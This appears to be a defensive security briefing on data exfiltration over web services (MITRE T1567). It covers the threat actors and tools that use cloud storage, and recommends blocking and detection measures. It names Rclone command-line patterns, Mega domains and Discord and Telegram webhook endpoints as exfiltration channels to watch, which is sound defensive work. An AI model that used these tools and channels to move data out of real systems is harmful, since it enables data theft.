State-Sponsored Espionage

Actor / Malware | Attribution | T1567 Usage
APT29 / BoomBox | Russia (SVR) | NOBELIUM early-stage toolset exfiltrating to cloud storage; Dropbox and other services for data staging
APT28 (Pawn Storm) | Russia (GRU) | Web service-based exfiltration as part of phishing and credential theft campaigns
Turla / Crutch | Russia (FSB) | Dropbox-based exfiltration blending data theft with C2 communications
OilRig (APT34) | Iran | Cloud service-powered downloaders serving as exfiltration channels (2023-2024)
Magic Hound (APT42) | Iran | Telegram Bot API endpoints for exfiltration of stolen data from compromised systems
Contagious Interview / Lazarus | North Korea | Telegram-based exfiltration via InvisibleFerret; cloud storage exfiltration also reported in Operation DEEP#DRIVE, a separate North Korea-attributed campaign
APT41 / DUSTTRAP | China | Cloud storage exfiltration documented in the 2024 "Arisen From the DUST" analysis
POLONIUM | Lebanon (Iran-linked) | Exfiltration to cloud services targeting Israeli organizations

Tools and Utilities

Tool | T1567 Usage
Rclone | Open-source file sync utility supporting 40+ cloud providers; found in 57% of ransomware exfiltration incidents (Symantec/Broadcom)
MegaSync / MegaCmd | Native Mega.nz client tools for file upload; favored for free storage and privacy protections
Exbyte | BlackByte's Go-based custom exfiltration tool for automated document collection and cloud upload
AzCopy | Microsoft's command-line copy tool for Azure Storage, abused by Storm-0501 for cloud-to-cloud exfiltration from Azure Storage accounts
ngrok | Tunnel service used to create encrypted exfiltration channels; observed in credit card skimming and data theft

Defensive Recommendations

1. Block or monitor uncommon cloud storage services

If your organization does not use Mega for business purposes, block network access to mega.nz, mega.co.nz, mega.io, and *.userstorage.mega.co.nz at the firewall or proxy. This removes the single most common exfiltration destination used by ransomware operators. Apply the same logic to other cloud storage services not sanctioned for business use. Where blocking is not feasible, configure high-priority alerts for any connection to these domains, and verify the block periodically, since a rule that silently stops matching is worse than none.

2. Detect and block Rclone execution

Rclone is rarely used legitimately in most enterprise environments. Deploy application control rules (AppLocker, WDAC) that block Rclone, keyed on file hash (or publisher, where the build is signed) rather than file name, since adversaries rename the binary. Hash rules need updating for each Rclone release, so pair them with detection: monitor for binaries whose version-resource metadata (OriginalFileName, FileDescription) identifies Rclone, and for its command-line patterns (--config, --transfers, copy, sync, a remote:path destination). Metadata plus command-line analysis catches renamed instances; a build with stripped metadata is caught only by the command line.

3. Implement outbound data volume monitoring

Baseline normal outbound data volumes per host, per user, and per destination. Alert when any host or user exceeds three standard deviations above their historical average, especially for connections to cloud storage services. A workstation that typically sends 200MB per day suddenly transferring 50GB to any cloud service — even a sanctioned one — should trigger immediate investigation. This volumetric approach detects exfiltration regardless of the specific tool or destination used.

4. Deploy a Cloud Access Security Broker (CASB)

A CASB provides visibility and control over cloud service usage, including the ability to distinguish between sanctioned corporate cloud accounts and personal or adversary-controlled accounts. Configure the CASB to block uploads to unsanctioned cloud tenants, monitor for anomalous upload volumes, and flag data transfers to new or unfamiliar cloud accounts. This is particularly important for detecting exfiltration to Google Drive or OneDrive accounts that are not part of the corporate tenant.

5. Monitor for data staging activity

Exfiltration is almost always preceded by data staging — the creation of compressed archive files containing the data to be stolen. Monitor for creation of large .zip, .rar, .7z, or .tar.gz files in temporary directories, user profile paths, or network share root directories. Correlate archive creation with subsequent network connections to cloud storage services. The staging-then-exfiltration pattern is a high-confidence detection signal.

6. Implement TLS inspection for cloud storage traffic

Where operationally and legally feasible, deploy TLS inspection (SSL/TLS decryption) for traffic to cloud storage services. This enables deep packet inspection that can detect data exfiltration based on the content being transferred. Be aware of privacy, legal, and operational implications — TLS inspection for banking sites and healthcare portals may violate regulations, and improperly configured inspection can break certificate pinning for legitimate applications.

7. Restrict webhook creation and monitor webhook traffic

In Discord, Slack, and Teams environments, restrict which users and integrations can create webhooks. Monitor for webhook traffic originating from non-browser processes, especially connections to discord.com/api/webhooks or api.telegram.org/bot from unsigned binaries or processes in user-writable directories. Webhook-based exfiltration is a growing vector for infostealers and commodity malware.

8. Secure Azure and cloud storage accounts against direct exfiltration

Storm-0501's 2025 cloud-based ransomware tactics show that adversaries can exfiltrate data directly from cloud storage accounts without touching the corporate network. Enable diagnostic logging (StorageRead, StorageWrite, StorageDelete) on Azure Storage accounts, disable anonymous blob access, restrict network access with storage firewall rules or private endpoints rather than leaving accounts reachable from any internet address, alert on changes to public-access and network settings, and monitor for AzCopy or bulk blob reads from accounts and source addresses that do not normally touch the data. Protect Entra ID with phishing-resistant MFA, because the intrusion started with stolen identities. Cloud-to-cloud exfiltration is invisible to on-premises network sensors.

MITRE ATT&CK Mapping

Field | Value
Technique ID | T1567
Technique Name | Exfiltration Over Web Service
Tactics | Exfiltration (TA0010)
Platforms | Windows, Linux, macOS, ESXi, SaaS, Office Suite
Sub-Techniques | T1567.001 Exfiltration to Code Repository; T1567.002 Exfiltration to Cloud Storage; T1567.003 Exfiltration to Text Storage Sites; T1567.004 Exfiltration Over Webhook
Data Sources | Network Traffic (Flow, Content), File (Access), Command (Execution), Application Log (Content)
Mitigations | Restrict Web-Based Content (M1021)
Version | 1.5 (last modified October 2025)
MITRE Reference | attack.mitre.org/techniques/T1567

Sources and References

  • MITRE ATT&CK — T1567 Exfiltration Over Web Service: attack.mitre.org
  • Microsoft — Storm-0501: Ransomware Attacks Expanding to Hybrid Cloud Environments: microsoft.com
  • Microsoft — Storm-0501's Evolving Techniques Lead to Cloud-Based Ransomware (2025): microsoft.com
  • CISA, FBI — Scattered Spider Advisory (Updated July 2025): cisa.gov
  • CISA, FBI, MS-ISAC — #StopRansomware: Medusa Ransomware (AA25-071A): cisa.gov
  • Red Canary — Rclone Wars: Transferring Leverage in a Ransomware Attack: redcanary.com
  • Symantec — Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool: security.com
  • Vectra AI — Double Extortion Ransomware: Detect It Before Data Is Lost (2025): vectra.ai
  • Picus Security — Red Report 2026: picussecurity.com
— end of briefing